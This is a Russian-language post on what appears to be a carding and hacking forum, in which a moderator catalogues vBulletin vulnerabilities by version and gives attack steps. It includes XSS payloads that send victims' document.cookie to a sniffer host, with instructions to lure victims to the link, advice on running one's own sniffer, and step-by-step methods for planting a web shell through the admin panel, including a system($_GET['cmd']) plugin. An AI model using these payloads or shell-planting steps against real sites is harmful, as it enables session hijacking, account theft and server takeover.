Заливы на карты - Платежные системы Обучение заливам на электронные кошельки и карты Карты с балансом - Купить карты с балансом
  1. Уважаемые посетители нашего форума. Ни в коем случае без проверки не проводите сделку с человеком, который предлагает услугу. Или используйте гаранта, либо если мы тему пропустили просите нас проверить его. И не забывайте зарегистрироваться на нашем форуме.
  2. Внимание. У нас изменились ns сервера домена. Некоторое время форум может у кого то не открываться. Все дело времени пока ваш провайдер не обновит свои днс сервера.
    Скрыть объявление

Уязвимость Vbulletin

Тема в разделе "Обзор уязвимостей vBulletin", создана пользователем Kven, 4 мар 2018.

  1. Автор темы
    Kven
    Offline

    Kven Модератор Команда форума Модератор Участник

    362
    51
    28
    обзор уязвимостей vBulletin

    Узнаём версию форума.
    В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума.
    Code:
    vbulletin_ajax_threadslist.js
    vbulletin_ajax_namesugg.js
    vbulletin_attachment.js
    vbulletin_cpcolorpicker.js
    vbulletin_editor.js

    vBulletin 2

    2.2.* - 2.2.4 - Выполнение произвольного кода
    Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'.
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    2.3.* - SQL injection
    Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.

    2.*.* - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки тэга email.

    vBulletin 3.0

    3.0.0 - XSS
    Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    3.0-3.0.4 - Выполнение произвольных команд
    Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.

    3.0.3–3.0.9 XSS
    Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
    Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.

    3.0.9 and 3.5.4 - XSS
    Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    vBulletin 3.5

    3.5.2 - XSS
    Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.

    3.5.3 - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".

    Пояснение: заходим в профиль и в поле email прописываем vashe@milo.com”><script>img = new Image(); img.src = "Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!{your id}, где {your id} ваш id. Cookie уйдут на снифер.

    3.5.4 - Дамп БД
    Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.

    3.5.4 - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    Уязвимости в модулях vBulletin.

    vBug Tracker 3.5.1 - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    ImpEx 1.74 - PHP-инклюдинг и выполнение команд
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    ibProArcade 2.x - SQL injection
    Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

    При использовании XSS c указанным в теме снифером. Логи смотреть тут: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Но лучше завести себе свой снифер -). Это можно сделать тут: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! или тут: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!.

    Шелл в vBulletin.

    Разберёмся как залить шелл из админки воблы.

    Способ заливки шелла в vBulletin 2.*.* и 3.0.*
    1. Заходим в админку.
    2. Смайлы.
    3. Загрузить смайл.
    4. Грузим наш шелл. (папка по умолчанию /images/smilies)
    5. Заходим Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Примечание: сработает не везде.


    Способ заливки шелла в vBulletin 3.5.*.
    1. Заходим в админку.
    2. Система модулей.
    3. Добавить новый модуль.
    Продукт: ставим vBulletin
    Месторасположение: Vbulletin: Справка - faq_complete
    Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
    4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! команда